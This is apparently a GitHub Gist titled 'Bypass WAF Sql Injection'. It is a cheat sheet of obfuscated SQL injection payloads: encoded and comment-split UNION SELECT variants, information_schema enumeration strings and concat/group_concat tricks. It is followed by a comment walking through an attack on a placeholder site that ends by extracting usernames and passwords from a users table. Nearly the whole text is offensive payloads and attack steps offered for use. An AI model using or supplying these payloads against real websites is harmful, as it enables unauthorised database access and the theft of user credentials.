-
-
Save naurizs/ecff10d0f12ee879f26f95f8bbd426c4 to your computer and use it in GitHub Desktop.
Bypass WAF Sql Injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [~] order by [~] | |
| /**/ORDER/**/BY/**/ | |
| /*!order*/+/*!by*/ | |
| /*!ORDER BY*/ | |
| /*!50000ORDER BY*/ | |
| /*!50000ORDER*//**//*!50000BY*/ | |
| /*!12345ORDER*/+/*!BY*/ | |
| [~] UNION select [~] | |
| /*!50000%55nIoN*/ /*!50000%53eLeCt*/ | |
| %55nion(%53elect 1,2,3)-- - | |
| +union+distinct+select+ | |
| +union+distinctROW+select+ | |
| /**//*!12345UNION SELECT*//**/ | |
| /**//*!50000UNION SELECT*//**/ | |
| /**/UNION/**//*!50000SELECT*//**/ | |
| /*!50000UniON SeLeCt*/ | |
| union /*!50000%53elect*/ | |
| +#uNiOn+#sEleCt | |
| +#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
| /*!%55NiOn*/ /*!%53eLEct*/ | |
| /*!u%6eion*/ /*!se%6cect*/ | |
| +un/**/ion+se/**/lect | |
| uni%0bon+se%0blect | |
| %2f**%2funion%2f**%2fselect | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
| REVERSE(noinu)+REVERSE(tceles) | |
| /*--*/union/*--*/select/*--*/ | |
| union (/*!/**/ SeleCT */ 1,2,3) | |
| /*!union*/+/*!select*/ | |
| union+/*!select*/ | |
| /**/union/**/select/**/ | |
| /**/uNIon/**/sEleCt/**/ | |
| +%2F**/+Union/*!select*/ | |
| /**//*!union*//**//*!select*//**/ | |
| /*!uNIOn*/ /*!SelECt*/ | |
| +union+distinct+select+ | |
| +union+distinctROW+select+ | |
| uNiOn aLl sElEcT | |
| UNIunionON+SELselectECT | |
| /**/union/*!50000select*//**/ | |
| 0%a0union%a0select%09 | |
| %0Aunion%0Aselect%0A | |
| %55nion/**/%53elect | |
| uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
| %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ | |
| %0A%09UNION%0CSELECT%10NULL% | |
| /*!union*//*--*//*!all*//*--*//*!select*/ | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
| /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
| +UnIoN/*&a=*/SeLeCT/*&a=*/ | |
| union+sel%0bect | |
| +uni*on+sel*ect+ | |
| +#1q%0Aunion all#qa%0A#%0Aselect | |
| union(select (1),(2),(3),(4),(5)) | |
| UNION(SELECT(column)FROM(table)) | |
| %23xyz%0AUnIOn%23xyz%0ASeLecT+ | |
| %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ | |
| union(select(1),2,3) | |
| union (select 1111,2222,3333) | |
| uNioN (/*!/**/ SeleCT */ 11) | |
| union (select 1111,2222,3333) | |
| +#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
| /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ | |
| %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ | |
| +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ | |
| +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
| /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ | |
| +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ | |
| /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ | |
| /union\sselect/g | |
| /union\s+select/i | |
| /*!UnIoN*/SeLeCT | |
| +UnIoN/*&a=*/SeLeCT/*&a=*/ | |
| +uni>on+sel>ect+ | |
| +(UnIoN)+(SelECT)+ | |
| +(UnI)(oN)+(SeL)(EcT) | |
| +’UnI”On’+'SeL”ECT’ | |
| +uni on+sel ect+ | |
| +/*!UnIoN*/+/*!SeLeCt*/+ | |
| /*!u%6eion*/ /*!se%6cect*/ | |
| uni%20union%20/*!select*/%20 | |
| union%23aa%0Aselect | |
| /**/union/*!50000select*/ | |
| /^.*union.*$/ /^.*select.*$/ | |
| /*union*/union/*select*/select+ | |
| /*uni X on*/union/*sel X ect*/ | |
| +un/**/ion+sel/**/ect+ | |
| +UnIOn%0d%0aSeleCt%0d%0a | |
| UNION/*&test=1*/SELECT/*&pwn=2*/ | |
| un?<ion sel="">+un/**/ion+se/**/lect+ | |
| +UNunionION+SEselectLECT+ | |
| +uni%0bon+se%0blect+ | |
| %252f%252a*/union%252f%252a /select%252f%252a*/ | |
| /%2A%2A/union/%2A%2A/select/%2A%2A/ | |
| %2f**%2funion%2f**%2fselect%2f**%2f | |
| union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
| /*!UnIoN*/SeLecT+ | |
| [~] information_schema.tables [~] | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - | |
| /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - | |
| /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table | |
| /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table | |
| [~] concat() [~] | |
| CoNcAt() | |
| concat() | |
| CON%08CAT() | |
| CoNcAt() | |
| %0AcOnCat() | |
| /**//*!12345cOnCat*/ | |
| /*!50000cOnCat*/(/*!*/) | |
| unhex(hex(concat(table_name))) | |
| unhex(hex(/*!12345concat*/(table_name))) | |
| unhex(hex(/*!50000concat*/(table_name))) | |
| [~] group_concat() [~] | |
| /*!group_concat*/() | |
| gRoUp_cOnCAt() | |
| group_concat(/*!*/) | |
| group_concat(/*!12345table_name*/) | |
| group_concat(/*!50000table_name*/) | |
| /*!group_concat*/(/*!12345table_name*/) | |
| /*!group_concat*/(/*!50000table_name*/) | |
| /*!12345group_concat*/(/*!12345table_name*/) | |
| /*!50000group_concat*/(/*!50000table_name*/) | |
| /*!GrOuP_ConCaT*/() | |
| /*!12345GroUP_ConCat*/() | |
| /*!50000gRouP_cOnCaT*/() | |
| /*!50000Gr%6fuP_c%6fnCAT*/() | |
| unhex(hex(group_concat(table_name))) | |
| unhex(hex(/*!group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!12345group_concat*/(table_name))) | |
| unhex(hex(/*!12345group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) | |
| unhex(hex(/*!50000group_concat*/(table_name))) | |
| unhex(hex(/*!50000group_concat*/(/*!table_name*/))) | |
| unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) | |
| convert(group_concat(table_name)+using+ascii) | |
| convert(group_concat(/*!table_name*/)+using+ascii) | |
| convert(group_concat(/*!12345table_name*/)+using+ascii) | |
| convert(group_concat(/*!50000table_name*/)+using+ascii) | |
| CONVERT(group_concat(table_name)+USING+latin1) | |
| CONVERT(group_concat(table_name)+USING+latin2) | |
| CONVERT(group_concat(table_name)+USING+latin3) | |
| CONVERT(group_concat(table_name)+USING+latin4) | |
| CONVERT(group_concat(table_name)+USING+latin5) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
waf bypass
SQL injection bypassing WAF (forbidden)
id=1+'UnI''On'+'SeL''ECT' 5. id=1+%55nion all /!12345%53elect/ 1,version(),3— 6.
id=1+UnIoN+SeLecT 1,2,3— 7. id=1+UnIOn/**/SeLect 1,2,3— 8. id=1+UNIunionON+SELselectECT
1,2,3— 9. id=1+/!UnIOn/+/!sElEcT/ 1,2,3— 10. id=1 and (select 1)=(Select 0xAA 1000 more
A’s)+UnIoN+SeLeCT 1,2,3— 11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
//T/1,2,3 14. id=1+//union/&id=/select/&id=/column/&id=/from/&id=/table-- 15. id=1+/
/union/&id=/select/&id=/1,2,3--
www.site.com/id?=4'
www.site.com/id?=4 oder by 1--error
www.site.com/id?=4 oder by 1--+ error :/
www.site.com/id?=4 oder by 1-- - error :/
www.site.com/id?=4 Group by 1-- - no error :D
www.site.com/id?=4 Group by 2-- no error
www.site.com/id?=4 Group by 3-- no error
www.site.com/id?=4 Group by 4-- no error
www.site.com/id?=4 Group by 5-- no error
www.site.com/id?=4 Group by 6-- no error
www.site.com/id?=4 Group by 7-- no error
www.site.com/id?=4 Group by 8-- error
part -2
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--
if u see 403 (forbidden) then we have to WAF Bypass
let's try waf bypass
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+ error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+- error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7-- - error
beshi kaj kora ( -- - )
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,2,3,4,5,6,7-- -
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,version(),3,4,5,6,7-- -
another way
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,@@Version,3,4,5,6,7-- -
for database name
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,@@database,3,4,5,6,7-- -
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,database(),3,4,5,6,7-- -
Part 3
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- - error :/ :/ :/
now amara aita k bypass korbo :)
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,/!table_name/,3,4,5,6,7+from /!information_schema/./!tables/ where table_schema=database()-- - :D :D :D
we got database :D :D :D
www.site.com/id?=-4 /!50000union/+/!50000select/ 1,unhex(hex(column_name)),3,4,5,6,7+from /!information_schema/.columns where table_name='users'--
another way
Char a covert kortey hoba from hackbar(plugin for firfox)
.......table_name=CHAR(117, 115, 101, 114, 115)-- -
tarpor a oo jodi na kora etc onek command aca.
unhex(hex(/!00000concat/(user,0x3a,pass)))
/!00000from/ users-- -
part 4
www.site.com/id?=-4 /!00000UnION/ SeLeCt 1,unhex(hex(/!00000concat/(username,0x3a,password))),3,4,5,6,7 /!00000from/ users-- -